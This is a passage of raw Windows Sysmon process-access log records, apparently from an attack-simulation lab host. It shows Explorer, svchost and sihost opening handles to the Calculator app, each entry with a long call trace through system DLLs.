Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6cfd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361022Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361021Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361020Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6c97|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6bab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000361019Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6b1a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361018Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361017Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361016Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361015Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361014Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361013Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361012Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361011Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1aaef|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361010Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361009Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361008Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361007Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361006Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.359{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361005Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361004Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.343{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361003Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.343{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361002Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7d4e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ca7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+299b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000361001Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\usermgrcli.dll+112d|C:\Windows\system32\activationmanager.dll+f9dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361000Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.328{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 